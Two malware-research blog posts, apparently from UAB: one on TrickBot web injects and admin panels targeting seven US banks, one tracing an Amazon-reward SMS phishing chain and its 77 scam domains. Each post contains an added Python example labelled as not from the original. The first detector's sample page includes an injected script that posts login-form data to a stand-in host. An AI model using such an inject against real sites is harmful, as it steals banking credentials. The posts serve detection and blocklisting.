Saturday, June 29, 2019

TrickBot: New Injects, New Host


What’s in the Name: Call it IcedID or TrickBot? Tell that to a security researcher (Arsh Arora in this case) and watch them RANT

(Gar-note: today's blog post is a guest blog from malware analyst, Arsh Arora...) 

Today’s post starts with an interesting link from Dawid Golak's Medium post, “IcedID aka# Bokbot Analysis with Ghidra”, which mentions that IcedID is dropping TrickBot. Although the article is about IcedID, it gets confusing quickly, because the researcher, while looking for IcedID artifacts, instead finds TrickBot artifacts. A big question that still remains for the security industry is how to classify the malware: by the originator, or by the binary that is being dropped. We followed up on the sample he mentioned and saw the same thing. This is definitely TrickBot.

First Stage – Sample Collection from VirusTotal Intelligence

In the "AnyRun Analysis" linked to by Dawid, the TrickBot binary was downloaded from “54.36.218[.]96 (slash) tin[.]exe”.



Fig 1: TrickBot Sample

Second Stage – Sample Execution

After the execution in a virtual environment, I was able to see TrickBot behavior similar to what we have documented in the past in our post "Trickbot's New Magic Trick: Sending Spam":

A large number of config files and DLLs were loaded into the Roaming/netcache/Data directory, a unique behavior of the TrickBot binary.

Fig 2: Configs and Dlls Loaded

Third Stage – Open Firefox and visit different bank websites

It is often the case that to get any banking trojan to co-operate with the researcher, some initiation from the researcher side is needed. Due to past experience, I have learned that one needs to open up a browser and visit different bank websites to activate the banking trojan. The trojan resists until instigated by visits to these pages. I visited close to 20 different bank websites and was able to obtain injects from 7 of those bank websites. The injects and admin login panels of the websites are as follows.

Name of Bank | Admin Login Panel | IP | Location
Bank of America | https://aefaldnessliverhearted[.]com/load/ | 185.242.6.245 | AS9009, Prague
Chase | https://aefaldnessliverhearted[.]com/load/ | 185.242.6.245 | AS9009, Prague
Citi | https://remirollerros[.]com/legr/ | 109.234.37.246 | AS48282, RU
USAA | https://onlylocaltrade[.]com/lob.php | 185.87.187.198 | AS48635, NL
WellsFargo | https://wellsfargostrade[.]com/2wells2 | 185.36.189.143 | AS50673, NL
PNC | https://wellsfargostrade[.]com/pncadmin/index.php | 185.36.189.143 | AS50673, NL
53 Bank | https://wellsfargostrade[.]com/53repadmin2 | 185.36.189.143 | AS50673, NL

When infected, viewing the page source while visiting one of the banks is all that is needed to identify the data exfiltration destination. Some examples follow from this infection run:
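As an added example (not code from the post or from UAB), here is a small Python checker for that step: given a saved copy of the bank's page as rendered in the infected browser, it lists every script, iframe, image or form target, and every URL inside inline script, whose host is not under the bank's own domain. The sample page and the "injected-panel.example" and "bank.example" hosts are constructed for the illustration; the check is the one a triage analyst would script rather than read the source by eye.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a stand-in for a bank login page as seen from an
# infected browser. The second <script> and the hidden <iframe> play the role of
# the inject; "injected-panel.example" is a placeholder, not a host from the post.
SAMPLE_PAGE = """<html><head>
<script src="https://www.bank.example/static/app.js"></script>
<script>
  // injected content: harvest the login form and post it off-site
  var _x = new XMLHttpRequest();
  _x.open("POST", "https://injected-panel.example/load/gate.php", true);
  _x.send(document.forms[0].innerHTML);
</script>
</head><body>
<form action="/login" method="post"><input name="user"><input name="pass"></form>
<img src="https://cdn.bank.example/logo.png">
<iframe src="https://injected-panel.example/load/frame.html" style="display:none"></iframe>
</body></html>"""

# Absolute URLs inside inline script text.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s'\"<>]*)?")

# Tag -> attribute that names a request target.
URL_ATTRS = {"script": "src", "iframe": "src", "form": "action", "img": "src", "link": "href"}


class InjectFinder(HTMLParser):
    """Collects (where, url) pairs for every target outside the bank's domain."""

    def __init__(self, bank_domain):
        super().__init__()
        self.bank_domain = bank_domain.lower()
        self.findings = []
        self._in_script = False

    def _check(self, where, url):
        host = urlparse(url).hostname
        if host is None:          # relative URL: same origin as the page
            return
        host = host.lower()
        if host == self.bank_domain or host.endswith("." + self.bank_domain):
            return                # the bank's own hosts (www., cdn., ...)
        self.findings.append((where, url))

    def handle_starttag(self, tag, attrs):
        attr = URL_ATTRS.get(tag)
        if attr:
            for name, value in attrs:
                if name == attr and value:
                    self._check(f"<{tag} {attr}>", value)
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data; scan them for URLs.
        if self._in_script:
            for url in URL_RE.findall(data):
                self._check("inline script", url)


def find_offsite_destinations(html, bank_domain):
    """Return [(where, url), ...] for every target not under bank_domain."""
    finder = InjectFinder(bank_domain)
    finder.feed(html)
    finder.close()
    return finder.findings


def offsite_hosts(html, bank_domain):
    """Sorted, de-duplicated list of off-site hosts, i.e. the candidate drop points."""
    return sorted({urlparse(u).hostname for _, u in find_offsite_destinations(html, bank_domain)})


if __name__ == "__main__":
    for where, url in find_offsite_destinations(SAMPLE_PAGE, "bank.example"):
        print(f"{where:15} {url}")
    print("hosts:", offsite_hosts(SAMPLE_PAGE, "bank.example"))
```

Run it against the same page saved from a clean machine as well: hosts that appear only in the infected copy are the inject's drop points. Legitimate CDNs and analytics providers will also show up as off-site, so keep an allowlist per bank; the script reports, it does not decide.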

BankofAmerica

Fig 3: BoA Web Inject

Chase

Fig 4: Chase Web Inject

Fig 5: BoA and Chase Admin Panel

Citi

Fig 6: Citi Web Inject

Fig 7: Citi Login Panel

USAA


Fig 8: USAA Web Inject

WellsFargo

Fig 9: WellsFargo Web Inject

Fig 10: WellsFargo Admin Panel

PNC

Fig 11: PNC Web Inject

Fig 12: PNC Admin Panel

53 Bank

Fig 13: 53 Bank Web Inject

Fig 14: 53 Bank Admin Panel


For more details please contact Arsh Arora (ararora at uab.edu) or Gary Warner (gar at uab.edu) at UAB. Please note:  Arsh is defending his PhD this summer and looking for new opportunities.


Saturday, June 01, 2019

SMS Phish? Amazon Reward!

Are you getting text messages about winning prizes at Amazon?

I got one today with the following text from a VOIP-to-SMS number: 1 (410) 200-910

The text was:
 "FRM: You have a New Amazon Reward! MSG: http://dmkr3h.com/njngyw"

I threw up a Virtual Machine to check the destination, and got a meaningless echo of the domain name:



The problem, of course, was that they knew I was supposed to be on a cell phone, since they sent me an SMS.  No problem.  Let's make my Windows Chrome Browser a Cell Phone: 

Ok.  Now I'm a Firefox browser on an Android Mobile phone.  Let's try again.  Much better!  The CloudFlare hosted "dmkr3h" now forwards me to "simple-clubs.com" which is a CNAME alias to "seempts-explegal[.]com (35.169.148.30)" which passes my origin and affiliate data to chargingmilkshop[.]com (51.75.46.9), which forwards me to "winopinions[.]com (51.75.46.11)" which shows me this!


Before I take my Survey, I hit my "Back" button, just to see what happens, because often there are traps about such things.  Sure enough, hitting the "Back" took me to an ad totally unrelated to my Amazon Prize:


As much as I'd like to be Ketogenically Accelerated, I decided to go back to my original URL from the phone.  This time I landed at "ZoneOpinions[.]com" instead of WinOpinions, but since I was still on the same IP address, I decided to keep going and take the survey this time.  Here are my five Survey Questions:






OK, now for the excitement!  My big Amazon Reward is about to be revealed, right?





Hmmm... do I want a larger penis, a flatter belly, or a $780 watch?  I think I'll take the $780 watch, since it's free and all ... 

Each time I click "Claim Reward" I get sent through a "1592track[.]com" redirector:
Which then forwards me to one of its randomly selected possible fulfillment domains ... 

getemergencygear[.]com
Odd.  Clicking on the watch takes me to a site for a free Tactical Flashlight. Oh well.  The point of this exercise is to feed some of my spam traps anyway.  We'll give them one of our spam trap email addresses just to see what they begin spamming to me. 

I wonder if ClickBank is complicit in these scams?
Since I'm not actually going to give them my credit card information, I'll see whether I get the same spam by submitting my address info for CBD Oil and Male Enhancement anyway.  Where do those clicks take me?
tryhealthoffer [.] com 


(a closer look at the Affiliate ID = 600080)

healthchoicev2 [.]com selling Primacin XL 


I saved which Spam Trap email I fed to each of the sites above.  If I start getting spam on them (none of them have existed before an hour ago and have never received any message prior to being fed to these sites) I'll do a follow-up post.

While trying to decide if this is something to share with my friends at the Federal Trade Commission, I decided to check what country these domains are hosted in ... Poland ... 

ipinfo.io/51.75.46.9 ==> OVH SAS in Poland.
According to the very useful tool at RiskIQ, it looks like 77 new domains stood up on this IP address about two days ago:
https://community.riskiq.com/search/51.75.46.9
We went ahead and exported that list so we could save a record of what other domains were there.  Looks like there are MANY alternative domains for doing the same sort of things ... 


resolve | firstSeen | lastSeen
actionopinion.com | 5/30/2019 | 5/31/2019
airopinions.com | 5/30/2019 | 5/31/2019
alertandfocusednow.com | 5/30/2019 | 5/31/2019
alertandsharp.com | 5/30/2019 | 5/31/2019
blazingtea.com | 5/30/2019 | 5/31/2019
brainexpandnow.com | 5/30/2019 | 5/31/2019
brainexpandtoday.com | 5/30/2019 | 5/31/2019
brainexpandtonight.com | 5/30/2019 | 5/31/2019
cellopinion.com | 5/29/2019 | 5/31/2019
centeropinion.com | 5/30/2019 | 5/31/2019
chargingmilkshake.com | 5/30/2019 | 6/1/2019
companyopinions.com | 5/30/2019 | 5/31/2019
connectexclusive.com | 5/25/2019 | 5/31/2019
corpprogram.com | 5/30/2019 | 5/31/2019
dataopinions.com | 5/30/2019 | 5/31/2019
dreamopinions.com | 5/30/2019 | 6/1/2019
exclusivetrendingreport.com | 5/25/2019 | 5/31/2019
fitketonow.com | 5/30/2019 | 5/31/2019
fitketotoday.com | 5/30/2019 | 5/31/2019
fullyhardagain.com | 5/30/2019 | 5/31/2019
fullyhardtonight.com | 5/30/2019 | 5/31/2019
hardandlongagain.com | 5/30/2019 | 5/31/2019
hardandlonger.com | 5/30/2019 | 5/31/2019
hotbreakingreports.com | 5/30/2019 | 5/31/2019
hotnewstonight.com | 5/30/2019 | 5/31/2019
hotviralreports.com | 5/30/2019 | 5/31/2019
latestbreakingreport.com | 5/30/2019 | 5/31/2019
latestviralreport.com | 5/30/2019 | 5/31/2019
learningopinion.com | 5/30/2019 | 5/31/2019
lineprogram.com | 5/30/2019 | 5/31/2019
linkopinions.com | 5/30/2019 | 5/31/2019
linksprogram.com | 5/30/2019 | 5/31/2019
longandhardagain.com | 5/30/2019 | 5/31/2019
longandhardtonight.com | 5/30/2019 | 5/31/2019
longerhardernow.com | 5/30/2019 | 5/31/2019
lookprogram.com | 5/30/2019 | 5/31/2019
lumberingsoda.com | 5/30/2019 | 5/31/2019
magicopinions.com | 5/30/2019 | 5/31/2019
matchopinion.com | 5/30/2019 | 5/31/2019
maxopinions.com | 5/30/2019 | 5/31/2019
mindexpandnow.com | 5/30/2019 | 5/31/2019
monsterprogram.com | 5/30/2019 | 5/31/2019
newbreakingreport.com | 5/30/2019 | 5/31/2019
newbreakingreports.com | 5/30/2019 | 5/31/2019
newtrendingreport.com | 5/30/2019 | 5/31/2019
newtrendingreports.com | 5/30/2019 | 5/31/2019
newviralreport.com | 5/29/2019 | 5/31/2019
portalopinion.com | 5/30/2019 | 5/31/2019
projectopinions.com | 5/30/2019 | 5/31/2019
romanwatermelon.com | 5/25/2019 | 5/31/2019
rushingcoffee.com | 5/30/2019 | 5/31/2019
saveopinion.com | 5/30/2019 | 5/31/2019
shesreadytonight.com | 5/30/2019 | 5/31/2019
shoppingopinions.com | 5/30/2019 | 5/31/2019
slimketonow.com | 5/30/2019 | 5/31/2019
slimketotoday.com | 5/30/2019 | 5/31/2019
slimketotonight.com | 5/30/2019 | 5/31/2019
slowseltzer.com | 5/30/2019 | 5/31/2019
sluggishjuice.com | 5/29/2019 | 5/31/2019
sprintingspirits.com | 5/30/2019 | 5/31/2019
swiftespresso.com | 5/30/2019 | 5/31/2019
teamopinions.com | 5/30/2019 | 5/31/2019
thenewstrends.com | 5/30/2019 | 5/31/2019
tightketonow.com | 5/30/2019 | 5/31/2019
tightketotoday.com | 5/30/2019 | 5/31/2019
tightketotonight.com | 5/30/2019 | 5/31/2019
todaysbreakingstory.com | 5/25/2019 | 5/31/2019
tonightsbreakingstory.com | 5/25/2019 | 5/31/2019
totalbreakingnews.com | 5/30/2019 | 5/31/2019
touchopinion.com | 5/30/2019 | 5/31/2019
trendstonight.com | 5/30/2019 | 5/31/2019
whirlingmilk.com | 5/30/2019 | 5/31/2019
winopinions.com | 5/30/2019 | 6/1/2019
yournewsbreaks.com | 5/30/2019 | 5/31/2019
yournewstrends.com | 5/30/2019 | 5/31/2019
zoneopinions.com | 5/30/2019 | 5/31/2019
zoomingcider.com | 5/30/2019 | 5/31/2019

Many of these domains have proven to be interchangeable, as long as your user agent is right: pasting the "path/file/parameters" from one site onto another of the same type usually works.
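Added example, not part of the original post: a Python parser for the passive-DNS export above (columns resolve / firstSeen / lastSeen, dates as M/D/YYYY as shown). It accepts rows whether the three fields are run together, as they are when the export is pasted, or separated by pipes or whitespace, and turns the list into a sinkhole-style blocklist, counts how many domains were first seen on each day (the "stood up about two days ago" observation), and tags each domain by the kind of offer its name fronts. SAMPLE_EXPORT is a handful of rows from the export above; the theme keywords and labels are constructed for this example from the naming patterns in the list.

```python
import re
from collections import Counter
from datetime import date

# Constructed sample: a subset of the export rows in the run-together form a
# pasted export lands in (domain, firstSeen, lastSeen with no separators),
# plus one row written with separators to show both are accepted.
SAMPLE_EXPORT = """\
resolvefirstSeenlastSeen
actionopinion.com5/30/20195/31/2019
cellopinion.com5/29/20195/31/2019
chargingmilkshake.com5/30/20196/1/2019
connectexclusive.com5/25/20195/31/2019
winopinions.com | 5/30/2019 | 6/1/2019
zoneopinions.com5/30/20195/31/2019
"""


def _date(tag):
    # M/D/YYYY, as the export prints dates
    return rf"(?P<m{tag}>\d{{1,2}})/(?P<d{tag}>\d{{1,2}})/(?P<y{tag}>\d{{4}})"


# Non-greedy domain: it stops at the first point where two dates can follow,
# which is what makes the separator-less rows parse unambiguously.
ROW = re.compile(
    r"^(?P<domain>[a-z0-9][a-z0-9.-]*?)[\s|]*" + _date("1") + r"[\s|]*" + _date("2") + r"\s*$",
    re.IGNORECASE,
)


def parse_export(text):
    """Return [(domain, first_seen, last_seen), ...]; lines that are not rows (the header) are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        g = m.groupdict()
        rows.append((
            g["domain"].lower(),
            date(int(g["y1"]), int(g["m1"]), int(g["d1"])),
            date(int(g["y2"]), int(g["m2"]), int(g["d2"])),
        ))
    return rows


def first_seen_burst(rows, threshold):
    """Days on which at least `threshold` domains were first seen, as {iso-date: count}."""
    by_day = Counter(first for _, first, _ in rows)
    return {day.isoformat(): n for day, n in sorted(by_day.items()) if n >= threshold}


def to_blocklist(rows):
    """Hosts-file style lines for a sinkhole or RPZ feed, one per domain, sorted."""
    return [f"0.0.0.0 {domain}" for domain, _, _ in sorted(rows)]


# keyword(s) -> label; constructed for this example from the naming patterns in the list
THEMES = (
    (("opinion",), "survey-landing"),
    (("keto",), "diet-offer"),
    (("breaking", "news", "report", "trend", "story"), "fake-news-landing"),
    (("hard", "long", "ready"), "male-enhancement"),
    (("brain", "mind", "alert"), "nootropic"),
)


def theme(domain):
    """Label a domain by the offer its name suggests; beverage-named hops fall into 'redirector/other'."""
    label_part = domain.split(".")[0]
    for keywords, label in THEMES:
        if any(k in label_part for k in keywords):
            return label
    return "redirector/other"


def theme_counts(rows):
    """How many domains in the export front each kind of offer."""
    return Counter(theme(domain) for domain, _, _ in rows)


if __name__ == "__main__":
    rows = parse_export(SAMPLE_EXPORT)
    print("burst days:", first_seen_burst(rows, threshold=3))
    print("themes:", dict(theme_counts(rows)))
    print("\n".join(to_blocklist(rows)))
```

Feed the full 77-row export in place of SAMPLE_EXPORT and the burst check reports the one day on which almost all of them appeared; the blocklist output is what you would hand to a resolver, and the theme counts show how much of the infrastructure is survey landing pages versus the redirectors and offer sites behind them.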

Conclusion?  Don't think I'm going to get my Amazon Prize.  Darn.